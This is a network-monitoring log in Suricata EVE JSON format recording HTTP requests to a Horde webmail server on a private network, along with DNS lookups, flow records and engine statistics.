{"timestamp":"2020-02-29T00:20:21.808452+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314}} {"timestamp":"2020-02-29T00:20:21.899880+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":5}} {"timestamp":"2020-02-29T00:20:21.902229+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:20:21.987567+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":2}} {"timestamp":"2020-02-29T00:20:26.000487+0000","flow_id":500671536956992,"event_type":"flow","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:24.919104+0000","end":"2020-02-29T00:15:25.027922+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:26.906231+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":6}} 
{"timestamp":"2020-02-29T00:20:27.000216+0000","event_type":"stats","stats":{"uptime":14879,"capture":{"kernel_packets":137323,"kernel_drops":0},"decoder":{"pkts":137344,"bytes":94189208,"invalid":192,"ipv4":135797,"ipv6":10,"ethernet":137344,"raw":0,"null":0,"sll":0,"tcp":130306,"udp":5284,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2419,"failed_udp":112},"tx":{"http":4799,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2501}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:28.000592+0000","flow_id":816909979187263,"event_type":"flow","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:27.489535+0000","end":"2020-02-29T00:15:27.598059+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:31.635589+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23772,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:31.841937+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26439,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.872860+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:31.892012+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:20:34.000209+0000","event_type":"stats","stats":{"uptime":14886,"capture":{"kernel_packets":137355,"kernel_drops":0},"decoder":{"pkts":137371,"bytes":94199869,"invalid":193,"ipv4":135824,"ipv6":10,"ethernet":137371,"raw":0,"null":0,"sll":0,"tcp":130328,"udp":5288,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2837,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2853,"synack":2844,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1872,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2421,"failed_udp":112},"tx":{"http":4800,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2503}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20171,"memcap_state":0,"memcap_global":0},"http":{"memuse":75698,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:36.893668+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52934,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.164889+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51815,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:39.420033+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.441359+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416}} {"timestamp":"2020-02-29T00:20:41.000209+0000","event_type":"stats","stats":{"uptime":14893,"capture":{"kernel_packets":137381,"kernel_drops":0},"decoder":{"pkts":137395,"bytes":94208142,"invalid":193,"ipv4":135848,"ipv6":10,"ethernet":137395,"raw":0,"null":0,"sll":0,"tcp":130350,"udp":5290,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2838,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2854,"synack":2845,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1873,"ftp
":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2422,"failed_udp":112},"tx":{"http":4801,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2504}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":75756,"memcap":0}}} {"timestamp":"2020-02-29T00:20:41.470817+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63665,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:41.735561+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417}} {"timestamp":"2020-02-29T00:20:43.000190+0000","flow_id":708895863071501,"event_type":"flow","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1838,"bytes_toclient":6314,"start":"2020-02-29T00:19:37.451341+0000","end":"2020-02-29T00:19:42.475356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000412+0000","flow_id":1590540979789703,"event_type":"flow","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1283,"bytes_toclient":2382,"start":"2020-02-29T00:19:37.450439+0000","end":"2020-02-29T00:19:42.475231+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000708+0000","flow_id":1179362285679512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":14,"bytes_toserver":1678,"bytes_toclient":13124,"start":"2020-02-29T00:19:37.291736+0000","end":"2020-02-29T00:19:42.475450+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:20:43.000952+0000","flow_id":1498976572011859,"event_type":"flow","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":752,"bytes_toclient":1678,"start":"2020-02-29T00:19:37.456019+0000","end":"2020-02-29T00:19:42.466796+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.001168+0000","flow_id":2243994484072541,"event_type":"flow","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":40,"bytes_toserver":3529,"bytes_toclient":50594,"start":"2020-02-29T00:19:37.450653+0000","end":"2020-02-29T00:19:42.622817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:44.442565+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52936,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} 
{"timestamp":"2020-02-29T00:20:45.000733+0000","flow_id":1508751902266416,"event_type":"flow","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:44.873520+0000","end":"2020-02-29T00:15:44.982402+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:46.736224+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34896,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:20:47.794898+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49707,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:47.972110+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380}} {"timestamp":"2020-02-29T00:20:48.000201+0000","event_type":"stats","stats":{"uptime":14900,"capture":{"kernel_packets":137420,"kernel_drops":0},"decoder":{"pkts":137421,"bytes":94218240,"invalid":193,"ipv4":135872,"ipv6":10,"ethernet":137421,"raw":0,"null":0,"sll":0,"tcp":130370,"udp":5294,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2839,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2855,"synack":2846,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_
layer":{"flow":{"http":1874,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2423,"failed_udp":113},"tx":{"http":4802,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2505}},"flow_mgr":{"closed_pruned":2811,"new_pruned":17,"est_pruned":2476,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":105095,"memcap":0}}} {"timestamp":"2020-02-29T00:20:48.252101+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":0}} {"timestamp":"2020-02-29T00:20:48.266257+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54605,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:48.443639+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} 